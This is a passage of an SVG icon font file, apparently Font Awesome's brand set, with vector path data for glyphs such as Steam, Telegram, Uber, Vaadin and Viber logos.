c0.280273 15.8105 -2.07031 39.7197 -28.8604 56.5898c-34.3594 21.6406 -84.96 19.4502 -84.4297 49.75c0.410156 23.25 30.96 25.3701 37.5303 25.2607c0.429688 0 26.6201 -0.260742 39.6201 -17.3701z" />
    <glyph glyph-name="staylinked" unicode="&#xf3f5;" horiz-adv-x="439" 
d="M382.7 155.5l44.2998 -41.2998c3.7002 -3.5 3.2998 -9 -0.700195 -12.2002l-198 -163.9c-9.89941 -7.59961 -17.2998 -0.799805 -17.2998 -0.799805l-208.7 196.101c-3.5 3.5 -3 9 1.2002 12.1992l45.7998 34.9004c4.2002 3.2002 10.4004 3 13.9004 -0.5l151.899 -147.5
c3.7002 -3.5 10 -3.7002 14.2002 -0.400391l93.2002 74c4.09961 3.2002 4.5 8.7002 0.900391 12.2002l-84 81.2998c-3.60059 3.5 -9.90039 3.7002 -14 0.5l-0.100586 -0.0996094c-4.09961 -3.2002 -10.3994 -3 -14 0.5l-68.0996 64.2998
c-3.5 3.5 -3.10059 9 1.09961 12.2002l57.2998 43.5996c4.10059 3.2002 10.3008 3 13.8008 -0.5l170 -167.3zM437.2 238.9c3.7002 -3.5 3.39941 -9 -0.700195 -12.2002l-45.7998 -35.7998c-4.10059 -3.2002 -10.4004 -3 -14.1006 0.5l-160.399 159
c-3.60059 3.5 -9.7998 3.69922 -13.9004 0.5l-92.2002 -71.5c-4.19922 -3.30078 -4.69922 -8.7002 -1.09961 -12.2002l94.5996 -91.7998c3.7002 -3.5 10 -3.60059 14.2002 -0.400391l0.100586 0.0996094c4.19922 3.2002 10.5996 3 14.1992 -0.5l57.1006 -54.3994
c3.7002 -3.5 3.2998 -9 -0.900391 -12.2002l-7.7002 -6l0.300781 -0.299805l-50.2002 -38.7998c-4.2002 -3.30078 -10.6006 -3.10059 -14.2998 0.399414l-171.7 165.101l-42.2998 41.6992c-3.60059 3.5 -3 9 1.19922 12.2002l206.801 162.101
c8.2998 6.59961 14.7998 2.2998 16.2998 1.09961z" />
    <glyph glyph-name="steam-symbol" unicode="&#xf3f6;" 
d="M395.5 270.5c0 -33.7998 -27.5 -61 -61 -61c-33.7998 0 -61 27.2998 -61 61s27.2998 61 61 61c33.5 0 61 -27.2002 61 -61zM448 270.3c0 -63 -51 -113.8 -113.7 -113.8l-109.3 -79.7998c-4 -43 -40.5 -76.7998 -84.5 -76.7998c-40.5 0 -74.7002 28.7998 -83 67
l-57.5 23.0996v107.3l97.2002 -39.2998c15.0996 9.2002 32.2002 13.2998 52 11.5l71 101.7c0.5 62.2998 51.5 112.8 114 112.8c62.7998 0 113.8 -51 113.8 -113.7zM203 85c0 34.7002 -27.7998 62.5 -62.5 62.5c-4.5 0 -9 -0.5 -13.5 -1.5l26 -10.5
c25.5 -10.2002 38 -39 27.7002 -64.5c-10.2002 -25.5 -39.2002 -38 -64.7002 -27.5c-10.2002 4 -20.5 8.2998 -30.7002 12.2002c10.5 -19.7002 31.2002 -33.2002 55.2002 -33.2002c34.7002 0 62.5 27.7998 62.5 62.5zM410.5 270.3c0 42 -34.2998 76.2002 -76.2002 76.2002
c-42.2998 0 -76.5 -34.2002 -76.5 -76.2002c0 -42.2002 34.2998 -76.2002 76.5 -76.2002c41.9004 -0.0996094 76.2002 33.9004 76.2002 76.2002z" />
    <glyph glyph-name="sticker-mule" unicode="&#xf3f7;" horiz-adv-x="576" 
d="M561.7 248.4c-1.2998 -0.300781 0.299805 0 0 0zM555.5 325.8c20.2002 -50.0996 20.5996 -45.2002 20.5996 -52.8994c0 -7.5 -4.09961 -11 -7.19922 -16.5c-1.5 -3 -4.60059 -7.5 -7.2002 -8c-0.400391 0 -3 -0.5 -13.4004 -2.5c-7.2002 -1 -13.3994 4.5 -14.8994 9.5
c-1.60059 4.69922 2.7998 10.0996 -11.8008 22.8994c-10.2998 10 -21.0996 11.2998 -31.8994 17c-9.7998 5.7002 -11.9004 -1 -18 -8c-18 -22.8994 -34 -46.8994 -52 -69.7998c-11.7998 -15 -24.2002 -30.4004 -33.5 -47.4004
c-3.90039 -6.7998 -9.5 -28.0996 -10.2998 -29.8994c-6.2002 -17.7002 -5.5 -25.7998 -16.5 -68.2998c-3.10059 -10 -5.7002 -21.4004 -8.7002 -32.4004c-2.2002 -6.7998 -7.40039 -49.2998 -0.5 -59.4004c2.09961 -3.5 8.7002 -4.5 11.2998 -8
c0.0996094 -0.0996094 9.59961 -18.1992 9.2998 -20c0 -6.09961 -9.39941 -5.59961 -11.2998 -6.5c-4.7998 -2.89941 -3.7998 -5.89941 -6.40039 -7.39941c-5.89941 -2.90039 -32.0996 -3.2002 -36.5 0.5c-4.09961 3 -2.19922 11.8994 -1.5 15
c2.2002 15 -2.5 7.89941 -9.7998 11.5c-3.09961 1.5 -4.09961 5.5 -4.59961 10c-0.5 1.5 -1 2.5 -1.5 3.5c-1.7002 10.7002 6.7998 33.5996 8.2002 43.3994c4.89941 23.7002 -0.700195 37.2002 1.5 46.9004c3.69922 16.2002 4.09961 3.5 4.09961 29.9004
c-1.40039 25.8994 3.2998 36.8994 0.5 38.8994c-14.7998 0 -64.2998 -10.7002 -112.2 -2c-46.0996 8.90039 -59.3994 29 -65.3994 30.9004c-10.3008 4.5 -23.2002 -0.5 -27.3008 -7c-0.0996094 -0.100586 -35 -70.6006 -39.5996 -87.7998
c-6.2002 -20.5 -0.5 -47.4004 4.09961 -66.8008c0 -0.0996094 4.5 -14.5996 10.3008 -19.5c2.09961 -1.5 5.09961 -2.5 7.19922 -4.5c2.80078 -2.69922 9.40039 -15.1992 9.80078 -16c2.59961 -4.5 3.59961 -8 -1.5 -10.5c-3.60059 -2 -9.30078 -2.5 -14.4004 -2.5
c-2.59961 -0.5 -1.5 -3.5 -3.09961 -5c-2.90039 -2.7998 -20.7002 -6.09961 -29.9004 -2.5c-2.59961 1 -5.7002 3 -6.2002 5c-1.5 4 2.10059 9 -1 12.5c-4.5 2.90039 -13.0996 2 -17 12c-2.2002 5.40039 -2.59961 7.60059 -2.59961 49.4004
c0 9.7002 -5.90039 38.7002 -8.2002 46.9004c-1.5 5.5 -1.5 11.5 0 16c0.299805 0.899414 4.09961 4.59961 4.09961 13c-1 1.5 -4.59961 0.5 -5.09961 1.5c-10.4004 80.5996 -5.90039 79 -7.7002 98.2998c-1.5 16 -10.8994 43.8994 -6.7002 64.2998
c0.5 2.40039 3.40039 21 24.2002 38.9004c31 26.6992 48.4004 38.2998 159 11.5c1.10059 -0.400391 66.2998 -21.1006 110.7 9c15.5 11.2998 28.7998 11.2998 35.5 16c0.0996094 0.0996094 61.7002 52.0996 87 65.2998c47.2002 29.3994 69.9004 16.7002 75.0996 18
c4.7002 1 13.4004 25.7998 17 25.7998c5.5 0 1.60059 -20.2002 3.60059 -25.9004c0.5 -2 3.59961 -5 6.2002 -5c2.2998 0 1.69922 0.800781 10.2998 5c8.39941 5.40039 14.8994 17.6006 20.5996 17c11.7002 -1.59961 -19 -41.5996 -19 -46.8994
c0 -2 0.200195 -0.799805 4.60059 -9.5c2.59961 -5.5 4.59961 -13.5 6.19922 -20c8.30078 -29.7002 5.7002 -14.6006 13.4004 -36.9004z" />
    <glyph glyph-name="studiovinari" unicode="&#xf3f8;" horiz-adv-x="511" 
d="M480.3 260.3l4.2002 -28v-28l-25.0996 -44.0996l-39.8008 -78.4004l-56.0996 -67.5l-79.0996 -37.7998l-17.7002 -24.5l-7.7002 -12l-9.59961 -4s17.2998 63.5996 19.3994 63.5996c2.10059 0 20.2998 -0.699219 20.2998 -0.699219l66.7002 38.5996l-92.5 -26.0996
l-55.8994 -36.8008l-22.8008 -28l-6.59961 -1.39941l20.7998 73.5996l6.90039 5.5l20.7002 -12.8994l88.2998 45.1992l56.7998 51.5l14.7998 68.4004l-125.399 -23.2998l15.1992 18.2002l-173.399 53.2998l81.8994 10.5l-166 122.899l114.9 -18.0996l-101.3 108
l252.899 -126.6l-31.5 38l124.4 -74.4004l-143.3 99l18.7002 -38.4004l-49.6006 18.1006l-45.5 84.2998l194.601 -122l-42.9004 55.7998l108 -96.3994l12 8.89941l-21 16.4004l4.2002 37.7998l37.7998 10.4004l29.2002 -24.7002l11.5 -4.2002l-7 -6.2002l8.5 -12
l-13.1006 -7.39941l-10.2998 -20.2002z" />
    <glyph glyph-name="supple" unicode="&#xf3f9;" horiz-adv-x="640" 
d="M640 185.5c0 -64.0996 -109 -116.1 -243.5 -116.1c-24.7998 0 -48.5996 1.7998 -71.0996 5c7.69922 -0.400391 15.5 -0.600586 23.3994 -0.600586c134.5 0 243.5 56.9004 243.5 127.101c0 29.3994 -19.0996 56.3994 -51.2002 78
c60 -21.1006 98.9004 -55.1006 98.9004 -93.4004zM47.7002 220.1c0.0996094 -29.3994 19.2998 -56.5 51.5996 -78c-60.2002 21 -99.2002 55 -99.2998 93.3008c-0.0996094 64.0996 108.8 116.3 243.3 116.699c24.7002 0 48.5 -1.69922 71 -4.89941
c-7.7002 0.299805 -15.3994 0.5 -23.2998 0.5c-134.5 -0.299805 -243.4 -57.4004 -243.3 -127.601zM107.9 180.2l8.7998 10.8994s8.7998 -10.0996 20.7002 -10.0996c6.5 0 12.2998 3.5 12.2998 10.0996c0 14.5 -40.2002 13.3008 -40.2002 39.9004
c0 13.9004 12 24.0996 28.5 24.0996c10 0 25.4004 -4.69922 25.4004 -16.7998v-7.89941h-14.2002v3.89941c0 4 -5.60059 6.60059 -11.2998 6.60059c-7.2002 0 -12.5 -3.7002 -12.5 -9.10059c0 -14.5996 40.1992 -11.7002 40.1992 -39.7002
c0 -13.5996 -10.5 -25.0996 -28.3994 -25.0996c-18.7998 0 -29.2998 13.2002 -29.2998 13.2002zM228.7 253.8h15.7002v-55c0 -18.8994 -13.3008 -31.8994 -33.4004 -31.8994c-20.2998 0 -33.7002 13 -33.7002 31.8994v55h15.7998v-54.5
c0 -11.2002 7.10059 -17.7002 17.8008 -17.7002c10.6992 0 17.7998 6.5 17.7998 17.8008v54.3994zM263.1 168.4v72h-7.7998v13.3994h39.1006c16 0 27.1992 -11.2002 27.1992 -27.7998s-11.1992 -28.0996 -27.1992 -28.0996h-15.5v-29.5h-15.8008zM278.9 211.4h12.5996
c8.90039 0 14 5.7998 14 14.6992c0 8.7002 -5 14.4004 -13.7002 14.4004h-12.8994v-29.0996zM335.9 168.4v72h-7.80078v13.3994h39.1006c16 0 27.2002 -11.2002 27.2002 -27.7998s-11.2002 -28.0996 -27.2002 -28.0996h-15.5v-29.5h-15.7998zM351.6 211.4h12.6006
c9 0 14 5.7998 14 14.6992c0 8.7002 -5 14.4004 -13.7002 14.4004h-12.9004v-29.0996zM408.7 176.6h0.0996094v61.2002c0 1.60059 -0.899414 2.60059 -2.59961 2.60059h-5.2002v13.3994h15.4004c5.7998 0 8.19922 -2.5 8.19922 -8.2002v-61.1992
c0 -1.60059 0.900391 -2.60059 2.60059 -2.60059h18.5996c1.60059 0 2.60059 0.900391 2.60059 2.60059v5.19922h14.2998v-13c0 -5.7998 -2.40039 -8.19922 -8.2002 -8.19922h-37.5996c-5.80078 0 -8.2002 2.39941 -8.2002 8.19922zM472.1 176.6h-0.0996094v63.9004h-7.7998
v13.4004h51.5996c5.7002 0 8.2002 -2.5 8.2002 -8.2002v-13h-14.2002v5.2002c0 1.59961 -0.899414 2.59961 -2.59961 2.59961h-19.2002v-22.4004h27.7002v-13.3994h-27.7002v-20.2998c0 -1.60059 0.900391 -2.60059 2.59961 -2.60059h19.7002
c1.60059 0 2.60059 0.900391 2.60059 2.60059v5.19922h14.2998v-13c0 -5.7998 -2.5 -8.19922 -8.2002 -8.19922h-38.7002c-5.7998 0 -8.2002 2.39941 -8.2002 8.19922zM531 252.6h-2.7002v1.2002h7v-1.2002h-2.7002v-5.89941h-1.59961v5.89941zM536.7 253.8h2.39941
l2.10059 -5.09961l2.09961 5.09961h2.2998v-7.09961h-1.5v5.7002l-2.2998 -5.7002h-1.2998l-2.2998 5.7002v-5.7002h-1.5v7.09961z" />
    <glyph glyph-name="telegram-plane" unicode="&#xf3fe;" horiz-adv-x="447" 
d="M446.7 349.4l-67.6006 -318.801c-5.09961 -22.5 -18.3994 -28.0996 -37.2998 -17.5l-103 75.9004l-49.7002 -47.7998c-5.5 -5.5 -10.0996 -10.1006 -20.6992 -10.1006l7.39941 104.9l190.9 172.5c8.2998 7.40039 -1.7998 11.5 -12.9004 4.09961l-236 -148.6
l-101.6 31.7998c-22.1006 6.90039 -22.5 22.1006 4.59961 32.7002l397.4 153.1c18.3994 6.90039 34.5 -4.09961 28.5 -32.1992z" />
    <glyph glyph-name="uber" unicode="&#xf402;" horiz-adv-x="447" 
d="M414.1 416c18.7002 0 33.9004 -15.2002 33.8008 -33.9004v-380.199c0 -18.7002 -15.2002 -33.9004 -33.9004 -33.9004h-380.1c-18.7002 0 -33.9004 15.2002 -33.9004 34v380.1c0 18.7002 15.2002 33.9004 33.9004 33.9004h380.199zM237.6 56.9004
c74.6006 7.5 129 74.0996 121.5 148.6c-7 69.4004 -65.3994 122.2 -135.1 122.2s-128.1 -52.7998 -135.1 -122.2h94.3994v20.4004c0 3.7998 3.10059 6.7998 6.7998 6.7998h67.9004c3.7998 0 6.7998 -3.10059 6.7998 -6.7998v-67.9004
c0 -3.7998 -3.09961 -6.7998 -6.7998 -6.7998h-67.9004c-3.7998 0 -6.7998 3.09961 -6.7998 6.7998v20.4004h-94.3994c7.5 -74.6006 74.0996 -129 148.699 -121.5z" />
    <glyph glyph-name="uikit" unicode="&#xf403;" horiz-adv-x="443" 
d="M443.9 320v-256l-225.9 -128l-218 128v214.3l87.5996 -45.0996v-117l133.5 -75.5l135.801 75.5v151l-101.101 57.5996l87.6006 53.1006zM308.6 398.9l-87.3994 -53l-86 47.2998l88.5996 54.7998z" />
    <glyph glyph-name="uniregistry" unicode="&#xf404;" horiz-adv-x="384" 
d="M192 -32c-39.5 0 -76.2002 11.7998 -106.7 32.2002h213.5c-30.5996 -20.4004 -67.2998 -32.2002 -106.8 -32.2002zM102.9 161.1c0 -2.5 0.0996094 -5 0.299805 -7.39941h-103.101c-0.0996094 2.39941 -0.0996094 4.89941 -0.0996094 7.39941v12.4004h102.9v-12.4004z
M123.4 104.1c8.89941 -10.5996 20.0996 -19.0996 33 -24.7998h-138.301c-3.7998 8 -7 16.2998 -9.59961 24.7998h114.9zM105.7 138.8c2 -7.89941 5.2002 -15.3994 9.2002 -22.2998h-109.7c-1.7002 7.2998 -3 14.7002 -3.90039 22.2998h104.4zM102.9 208.1v-17.2998h-102.9
v17.2998h102.9zM102.9 381.3v-4.89941h-102.9v4.89941h102.9zM102.9 416v-2.5h-102.9v2.5h102.9zM102.9 346.7v-7.40039h-102.9v7.40039h102.9zM102.9 242.7v-14.7998h-102.9v14.7998h102.9zM102.9 312v-9.90039h-102.9v9.90039h102.9zM102.9 277.4v-12.4004h-102.9v12.4004
h102.9zM269.1 116.5c4 6.90039 7.10059 14.4004 9.2002 22.2998h104.4c-0.799805 -7.59961 -2.10059 -15 -3.90039 -22.2998h-109.7zM281.1 302.2v9.7998h102.9v-9.7998h-102.9zM281.1 265v12.4004h102.9v-12.4004h-102.9zM281.1 339.3v7.40039h102.9v-7.40039h-102.9z
M281.1 416h102.9v-2.5h-102.9v2.5zM78.0996 5.09961c-11.7998 8.7002 -23.5996 18.7002 -33.1992 29.7002h293.1c-9.5 -11.0996 -20.4004 -21 -32.2002 -29.7002h-227.7zM281.1 376.4v4.89941h102.9v-4.89941h-102.9zM281.1 227.9v14.7998h102.9v-14.7998h-102.9z
M38.7998 42.2998c-6.59961 8.5 -10.5996 17.6006 -15.7998 27.2002h338.9c-5.2002 -9.59961 -11.1006 -18.7002 -17.8008 -27.2002h-305.3zM227.6 79.4004c12.8008 5.59961 24.1006 14.0996 32.9004 24.7998h115c-2.7002 -8.60059 -4.7998 -16.7998 -8.5 -24.7998h-139.4z
M281.1 161.1v12.4004h102.9v-12.4004c0 -2.5 -0.0996094 -4.89941 -0.200195 -7.39941h-103.1c0.299805 2.39941 0.399414 4.89941 0.399414 7.39941zM281.1 190.8v17.2998h102.9v-17.2998h-102.9z" />
    <glyph glyph-name="untappd" unicode="&#xf405;" horiz-adv-x="640" 
d="M401.3 398.1c-79.7998 -160.1 -84.5996 -152.5 -87.8994 -173.199l-5.2002 -32.8008c-1.90039 -12 -6.60059 -23.5 -13.7002 -33.3994l-148.9 -207.8c-7.59961 -10.6006 -20.3994 -16.2002 -33.3994 -14.6006c-40.2998 5 -77.7998 32.2002 -95.2998 68.5
c-5.7002 11.7998 -4.5 25.7998 3.09961 36.4004l148.9 207.899c7.09961 9.90039 16.3994 18 27.1992 23.7002l29.3008 15.5c18.5 9.7998 9.69922 11.9004 135.6 138.9c1 4.7998 1 7.2998 3.59961 8c3 0.700195 6.60059 1 6.30078 4.59961l-0.400391 4.60059
c-0.200195 1.89941 1.2998 3.59961 3.2002 3.59961c4.5 0.0996094 13.2002 -1.2002 25.5996 -10c12.2998 -8.90039 16.4004 -16.7998 17.7002 -21.0996c0.599609 -1.80078 -0.599609 -3.7002 -2.40039 -4.2002l-4.5 -1.10059
c-3.39941 -0.899414 -2.5 -4.39941 -2.2998 -7.39941c0.100586 -2.7998 -2.2998 -3.60059 -6.5 -6.10059zM230.1 411.6c-3.19922 0.800781 -8.19922 1.2002 -6.7998 5.40039c1.2998 4.2998 5.40039 12.2002 17.7002 21.0996c12.4004 8.90039 21.0996 10.1006 25.5996 10
c4.2002 -0.0996094 3.10059 -4.89941 2.80078 -8.19922c-0.300781 -3.60059 3.2998 -3.80078 6.2998 -4.60059c2.59961 -0.700195 2.59961 -3.2998 3.59961 -8c9.10059 -9.2002 17.6006 -17.8994 25.6006 -26.0996c1.2998 -1.40039 1.19922 -3.5 -0.100586 -4.90039
c-15.8994 -16.3994 -29.2998 -30.5996 -40.5 -42.5996c-1 -1 -2.59961 -0.799805 -3.2998 0.5c-6.90039 13.5 -14.2998 28.0996 -22.2002 44c-4.2998 2.5 -6.59961 3.2998 -6.39941 6c0.199219 3 1.09961 6.5 -2.30078 7.39941zM620 41.2998
c7.7002 -10.7002 8.7998 -24.7002 3.40039 -36.5996c-17.7002 -36.6006 -55.4004 -63.7002 -95.7002 -68.6006c-12.9004 -1.5 -25.5 4.10059 -33.1006 14.7002l-148.899 207.9c-7.10059 9.89941 -11.7998 21.3994 -13.7002 33.3994
c-1.59961 9.80078 -2 19.1006 -0.299805 29.8008c1.89941 12 2.7002 6 49 94.7998c0.700195 1.39941 2.59961 1.59961 3.59961 0.5c16.2998 -18 19.2998 -23 30.5 -28.9004c29.7998 -15.7002 43.2002 -20.5996 56.4004 -39.0996z" />
    <glyph glyph-name="ussunnah" unicode="&#xf407;" horiz-adv-x="512" 
d="M156.8 162.9l5.7002 -14.4004h-8.2002c-1.2998 3.2002 -3.09961 7.7002 -3.7998 9.5c-2.5 6.2998 -1.09961 8.40039 0 10c1.90039 2.7002 3.2002 4.40039 3.59961 5.2002c0 -2.2002 0.800781 -5.7002 2.7002 -10.2998zM454.1 144.1
c-2.09961 -13.7998 -5.69922 -27.0996 -10.5 -39.6992l43 -23.4004l-44.7998 18.7998c-5.2998 -13.2002 -12 -25.5996 -19.8994 -37.2002l34.1992 -30.1992l-36.7998 26.3994c-8.39941 -11.7998 -18 -22.5996 -28.7002 -32.2998l24.9004 -34.7002l-28.0996 31.7998
c-11 -9.59961 -23.1006 -18 -36.1006 -25.0996l15.7002 -37.2002l-19.2998 35.2998c-13.1006 -6.7998 -27 -12.0996 -41.6006 -15.8994l6.7002 -38.4004l-10.5 37.4004c-14.2998 -3.40039 -29.2002 -5.2998 -44.5 -5.40039l-1.7998 -38.2998l-1.90039 38.4004
c-15.2998 0.0996094 -30.1992 2 -44.5 5.2998l-10.5996 -37.2998l6.7002 38.1992c-14.6006 3.7002 -28.6006 9.10059 -41.7002 15.8008l-19.2002 -35.1006l15.6006 37c-13 7 -25.2002 15.4004 -36.2002 25.1006l-27.9004 -31.6006l24.7002 34.4004
c-10.7002 9.7002 -20.4004 20.5 -28.7998 32.2998l-36.5 -26.2002l33.8994 29.9004c-7.89941 11.5996 -14.5996 24.0996 -20 37.2998l-44.3994 -18.7002l42.5996 23.2002c-4.7998 12.7002 -8.39941 26.0996 -10.5 39.9004l-51 -9l50.2998 14.1992
c-1.09961 8.5 -1.69922 17.1006 -1.69922 25.9004c0 4.7002 0.199219 9.40039 0.5 14.0996l-55.4004 2.90039l56 2.7998c1.2998 13.1006 3.7998 25.7998 7.5 38.1006l-57.0996 16.0996l58.8994 -10.4004c4 12 9.10059 23.5 15.2002 34.4004l-55.0996 30l58.2998 -24.5996
c6.2998 10.5996 13.5 20.3994 21.5996 29.5996l-49.5 43.5996l53.9004 -38.6992c8.09961 8.59961 17 16.5 26.5996 23.5996l-40 55.5996l45.6006 -51.5996c9.5 6.59961 19.6992 12.2998 30.2998 17.2002l-27.2998 64.8994l33.7998 -62.0996
c10.5 4.40039 21.3994 7.90039 32.7002 10.4004l-12.4004 70.6992l19.5 -69.1992c11 2.09961 22.2998 3.19922 33.7998 3.39941l3.7002 72.2002l3.59961 -72.2002c11.5 -0.200195 22.8008 -1.39941 33.8008 -3.5l19.5996 69.2998l-12.4004 -70.6992
c11.3008 -2.60059 22.2002 -6.10059 32.6006 -10.5l33.8994 62.1992l-27.3994 -65.0996c10.5996 -4.90039 20.7002 -10.7002 30.2002 -17.2002l45.7998 51.7998l-40.1006 -55.8994c9.5 -7.10059 18.4004 -15 26.5 -23.6006l54.2002 38.9004l-49.7002 -43.9004
c8 -9.09961 15.2002 -18.8994 21.5 -29.3994l58.7002 24.7002l-55.5 -30.2002c6.10059 -10.9004 11.1006 -22.2998 15.1006 -34.2998l59.2998 10.3994l-57.5 -16.2002c3.7002 -12.1992 6.2002 -24.8994 7.5 -37.8994l56.2998 -2.7002l-56 -2.7998
c0.299805 -4.60059 0.5 -9.2998 0.5 -14.1006c0 -8.69922 -0.599609 -17.2998 -1.59961 -25.7998l50.6992 -14.2998zM432.3 175.1c0 97.5 -79 176.5 -176.5 176.5s-176.5 -79 -176.5 -176.5s79 -176.5 176.5 -176.5s176.5 79 176.5 176.5zM408.3 175.1
c0 -84.2998 -68.2998 -152.6 -152.6 -152.6s-152.601 68.2998 -152.601 152.6c0 84.3008 68.3008 152.601 152.601 152.601s152.6 -68.2998 152.6 -152.601zM195 207c0 -2.09961 1.2998 -3.7998 3.59961 -5.09961c3.30078 -1.90039 6.2002 -4.60059 8.2002 -8.2002
c2.7998 5.7002 4.2998 9.5 4.2998 11.2002c0 2.19922 -1.09961 4.39941 -3.19922 7c-2.10059 2.5 -3.2002 5.19922 -3.30078 7.69922c-6.5 -6.7998 -9.59961 -10.8994 -9.59961 -12.5996zM154.3 226c0 -2.09961 1.2998 -3.7998 3.60059 -5.09961
c3.5 -1.90039 6.19922 -4.60059 8.19922 -8.2002c2.80078 5.7002 4.30078 9.5 4.30078 11.2002c0 2.19922 -1.10059 4.39941 -3.2002 7c-2.10059 2.5 -3.2002 5.19922 -3.2998 7.69922c-6.5 -6.7998 -9.60059 -10.8994 -9.60059 -12.5996zM135.3 226
c0 -2.09961 1.2998 -3.7998 3.60059 -5.09961c3.2998 -1.90039 6.19922 -4.60059 8.19922 -8.2002c2.80078 5.7002 4.30078 9.5 4.30078 11.2002c0 2.19922 -1.10059 4.39941 -3.2002 7c-2.10059 2.5 -3.2002 5.19922 -3.2998 7.69922
c-6.40039 -6.7998 -9.60059 -10.8994 -9.60059 -12.5996zM340.2 138.1c-8.40039 3 -8.7002 6.80078 -8.7002 15.6006v112.3c-8.2002 -12.5 -14.2002 -18.5996 -18 -18.5996c6.2998 -14.4004 9.5 -23.9004 9.5 -28.3008v-64.2998c0 -2.2002 -2.2002 -6.5 -4.7002 -6.5h-18
c-2.7998 7.5 -10.2002 26.9004 -15.2998 40.2998c-2 -2.5 -7.2002 -9.19922 -10.7002 -13.6992c2.40039 -1.60059 4.10059 -3.60059 5.2002 -6.30078c2.59961 -6.69922 6.40039 -16.5 7.90039 -20.1992h-9.2002c-3.90039 10.3994 -9.60059 25.3994 -11.7998 31.0996
c-2 -2.5 -7.2002 -9.2002 -10.7002 -13.7002c2.39941 -1.59961 4.09961 -3.59961 5.2002 -6.2998c0.799805 -2 2.7998 -7.2998 4.2998 -10.9004h-9.2002c-1.5 4.10059 -5.59961 14.6006 -8.40039 22c-2 -2.5 -7.19922 -9.19922 -10.6992 -13.6992
c2.5 -1.60059 4.2998 -3.60059 5.19922 -6.30078c0.200195 -0.599609 0.5 -1.39941 0.600586 -1.69922h-17.7002c-4.59961 13.8994 -11.4004 27.6992 -11.4004 34.0996c0 2.2002 0.300781 5.09961 1.10059 8.2002c-8.7998 -10.7998 -14 -15.9004 -14 -25
c0 -7.5 10.3994 -28.2998 10.3994 -33.2998c0 -1.7002 -0.5 -3.30078 -1.39941 -4.90039c-9.60059 12.7002 -15.5 20.7002 -18.7998 20.7002h-12l-11.2002 28c-3.7998 9.59961 -5.7002 16 -5.7002 18.7998c0 3.7998 0.5 7.7002 1.7002 12.2002
c-1 -1.2998 -3.7002 -4.7002 -5.5 -7.10059c-0.799805 2.10059 -3.10059 7.7002 -4.60059 11.5c-2.09961 -2.5 -7.5 -9.09961 -11.1992 -13.5996c0.899414 -2.2998 3.2998 -8.09961 4.89941 -12.2002c-2.5 -3.2998 -9.09961 -11.7998 -13.5996 -17.7002
c-4 -5.2998 -5.7998 -13.2998 -2.7002 -21.7998c2.5 -6.7002 2 -7.89941 -1.7002 -14.0996h61.7002c5.5 0 14.2998 -14 15.5 -22c13.2002 16 15.4004 19.5996 16.7998 21.5996h107c3.90039 0 7.2002 1.90039 9.90039 5.7998zM360.3 164.7v101.6
c-9 -12.5 -15.8994 -18.5996 -20.7002 -18.5996c7.10059 -14.4004 10.7002 -23.9004 10.7002 -28.2998v-66.3008c0 -17.5 8.60059 -20.3994 24 -20.3994c8.10059 0 12.5 0.799805 13.7002 2.7002c-4.2998 1.59961 -7.59961 2.5 -9.90039 3.2998
c-8.09961 3.2002 -17.7998 7.39941 -17.7998 26z" />
    <glyph glyph-name="vaadin" unicode="&#xf408;" 
d="M224.5 307.3c1.5 17.6006 4.90039 52.7002 49.7998 52.7002h98.6006c20.6992 0 32.0996 7.7998 32.0996 21.5996v12.3008c0 12.1992 9.2998 22.0996 21.5 22.0996s21.5 -9.90039 21.5 -22.0996v-36.5c0 -42.9004 -21.5 -62 -66.7998 -62h-100.5
c-30.1006 0 -33 -14.7002 -33 -27.1006c0 -1.2998 -0.100586 -2.5 -0.200195 -3.7002c-0.700195 -12.2998 -10.9004 -22.1992 -23.4004 -22.1992s-22.6992 9.7998 -23.3994 22.1992c-0.100586 1.2002 -0.200195 2.40039 -0.200195 3.7002c0 12.2998 -3 27.1006 -33 27.1006
h-100.7c-45.2998 0 -66.7998 19.0996 -66.7998 62v36.5c0 12.1992 9.40039 22.0996 21.5996 22.0996c12.2002 0 21.5 -9.90039 21.5 -22.0996v-12.3008c0 -13.7998 11.4004 -21.5996 32.1006 -21.5996h98.5996c44.7998 0 48.2998 -35.0996 49.7998 -52.7002h0.900391z
M224 -8c-11.5 0 -21.4004 7 -25.7002 16.2998c-1.09961 1.7998 -97.0996 169.5 -98.2002 171.4c-11.8994 19.7002 3.2002 44.2998 27.2002 44.2998c13.9004 0 23.4004 -6.40039 29.7998 -20.2998l66.9004 -117.7l66.9004 117.7c6.5 13.8994 15.8994 20.2998 29.7998 20.2998
c24 0 39.0996 -24.7002 27.2002 -44.2998c-1.10059 -1.7998 -97.1006 -169.601 -98.2002 -171.4c-4.2998 -9.2998 -14.2002 -16.2998 -25.7002 -16.2998z" />
    <glyph glyph-name="viber" unicode="&#xf409;" horiz-adv-x="511" 
d="M444 398.1c42.2002 -36.6992 65.5996 -117.899 49.7998 -246.5c-15.2002 -124.6 -109.1 -136.6 -125.7 -142c-7.19922 -2.2998 -70.2998 -18.0996 -152.5 -11.1992c-9.09961 -10.5 -21.0996 -24.3008 -29.7998 -33.7002
c-15.8994 -17.1006 -25.7002 -33 -42.2998 -27.7998c-13.7998 4.19922 -13 25.0996 -13 25.0996l0.0996094 51.5996h-0.0996094c-120.1 33.8008 -118.4 158.4 -117 224.9s14.2998 120.2 50.9004 156.8c65.7998 60.4004 200.899 52.2998 200.899 52.2998
c114.601 -0.5 166 -37.7998 178.7 -49.5zM457.9 161c13.2998 107.3 -4.90039 180.5 -40.6006 211.1c-10.7998 9.80078 -57.2002 39 -154.1 39.4004c0 0 -114.7 7.5 -170.4 -43c-31 -30.5996 -41.5 -76.0996 -42.5996 -131.6
c-1.10059 -55.5 -7.10059 -161.601 94.7002 -189.801c-0.100586 0 -0.100586 0 0 0c0 0 -0.400391 -78.7998 -0.400391 -85.6992c-0.0996094 -10.5 5.7002 -11 11 -5.7002c16.2002 16.2998 68.2002 79 68.2002 79c69.7002 -4.5 125.2 9.2998 131.2 11.2002
c14 4.5 90.0996 11.0996 103 115.1zM318.9 241.8c0.399414 -8.59961 -12.5 -9.2002 -12.9004 -0.599609c-1.09961 22 -11.4004 32.7002 -32.5996 33.8994c-8.60059 0.5 -7.80078 13.4004 0.699219 12.9004c27.9004 -1.5 43.4004 -17.5 44.8008 -46.2002zM339.2 230.5
c1 42.4004 -25.5 75.5996 -75.7998 79.2998c-8.5 0.600586 -7.60059 13.5 0.899414 12.9004c58 -4.2002 88.9004 -44.1006 87.7998 -92.5c-0.0996094 -8.60059 -13.0996 -8.2002 -12.8994 0.299805zM386.2 217.1c0.0996094 -8.59961 -12.9004 -8.69922 -12.9004 -0.0996094
